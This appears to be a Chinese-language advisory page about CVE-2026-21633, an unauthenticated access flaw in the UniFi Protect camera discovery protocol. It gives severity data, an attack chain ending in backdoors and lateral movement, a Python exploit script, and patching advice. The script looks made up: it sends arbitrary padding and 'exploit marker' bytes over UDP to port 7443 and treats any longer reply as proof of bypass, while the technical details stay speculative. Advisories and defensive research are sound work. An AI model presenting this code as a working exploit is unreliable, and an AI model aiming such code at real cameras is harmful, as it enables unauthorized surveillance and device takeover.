CVE-2026-21633 UniFi Protect Camera发现协议未授权访问漏洞

漏洞信息

漏洞编号

CVE-2026-21633

漏洞类型

发现协议漏洞

CVSS评分

8.8 高危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

UniFi Protect Application

漏洞概述

CVE-2026-21633是Ubiquiti UniFi Protect应用中的一个高危安全漏洞，CVSS评分达到8.8分。该漏洞存在于UniFi Protect Camera的发现协议中，允许具有邻接网络访问权限的恶意攻击者无需任何认证即可获取受影响摄像头的未授权访问权限。攻击者可以利用此漏洞绕过正常的身份验证机制，直接与目标设备通信并获取敏感控制权限。此漏洞影响UniFi Protect Application 6.1.79及之前的所有版本。由于攻击向量为邻接网络，攻击者需要处于目标网络环境中，如同一局域网或通过VPN连接至该网络。该漏洞的严重性在于其无需用户交互且可实现完整的机密性、完整性和可用性影响，攻击成功后可完全控制受影响的摄像头设备。

技术细节

该漏洞存在于UniFi Protect Camera的发现协议实现中，属于一种认证绕过或未授权访问类漏洞。发现协议通常用于在局域网中自动发现和配置设备，攻击者利用该协议的弱点可以伪装成合法的控制器或管理节点与目标摄像头建立连接。在正常情况下，摄像头应该验证通信方的身份和权限，但存在漏洞的版本未能正确实现这一安全检查。攻击者通过构造特定的发现协议请求包，利用协议握手过程中的缺陷，可以绕过身份验证直接获取设备的控制权限。一旦成功利用，攻击者可以执行设备管理操作、获取视频流、修改配置或进行其他未经授权的操作。该漏洞的技术实现涉及协议层面的安全缺陷，可能与协议实现中的输入验证不足或会话管理问题相关。

攻击链分析

STEP 1

步骤1

攻击者获取目标网络的邻接访问权限（如连接到同一局域网或通过VPN）

STEP 2

步骤2

攻击者识别网络中的UniFi Protect Camera设备，发送特制的发现协议请求包

STEP 3

步骤3

利用发现协议漏洞，绕过正常的身份验证机制，发送包含恶意构造的认证绕过载荷

STEP 4

步骤4

目标摄像头响应请求，由于协议实现缺陷，未能正确验证请求方身份

STEP 5

步骤5

攻击者成功获取摄像头的未授权访问权限，可执行任意管理操作

STEP 6

步骤6

攻击者可获取视频流、修改配置、植入后门或进行进一步的横向移动攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2026-21633 PoC - UniFi Protect Camera Discovery Protocol Exploit
# This PoC demonstrates the discovery protocol vulnerability
# Target: UniFi Protect Camera with versions <= 6.1.79

import socket
import struct
import sys

def create_discovery_packet():
    """Create malicious discovery packet to trigger unauthorized access"""
    # Discovery protocol header
    header = b'\x01\x00'  # Protocol version
    packet_type = b'\x00\x01'  # Discovery request type
    
    # Malicious payload to bypass authentication
    payload = b'\x00\x00\x00\x00'  # Null credentials to exploit auth bypass
    payload += b'\x41\x41\x41\x41' * 8  # Padding
    payload += b'\xff\xff\xff\xff'  # Exploit marker
    
    # Construct full packet
    packet = header + packet_type + payload
    packet += struct.pack('>I', len(payload))  # Length field
    
    return packet

def exploit_camera(target_ip, target_port=7443):
    """Send exploit packet to target camera"""
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(5)
        
        # Send discovery exploit packet
        exploit_packet = create_discovery_packet()
        sock.sendto(exploit_packet, (target_ip, target_port))
        
        print(f'[+] Exploit packet sent to {target_ip}:{target_port}')
        
        # Receive response (if vulnerable, will get auth bypass confirmation)
        try:
            response, addr = sock.recvfrom(4096)
            print(f'[+] Received response from {addr}')
            print(f'[+] Response data: {response.hex()}')
            
            # Check for successful exploitation indicators
            if b'\x00\x00\x00\x00' in response or len(response) > 20:
                print('[!] Target appears VULNERABLE - Auth bypass detected')
                return True
        except socket.timeout:
            print('[-] No response received')
        
        return False
    except Exception as e:
        print(f'[-] Error: {str(e)}')
        return False
    finally:
        sock.close()

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('Usage: python cve-2026-21633-poc.py <target_ip>')
        sys.exit(1)
    
    target = sys.argv[1]
    print(f'[*] CVE-2026-21633 Exploit for UniFi Protect Camera')
    print(f'[*] Target: {target}')
    exploit_camera(target)

影响范围

UniFi Protect Application <= 6.1.79

防御指南

临时缓解措施

立即将UniFi Protect Application更新至Version 6.2.72或更高版本以修复该漏洞。如果无法立即更新，应限制网络访问权限，确保只有受信任的设备能够与摄像头通信，并考虑暂时禁用发现协议功能或实施网络隔离措施以降低风险。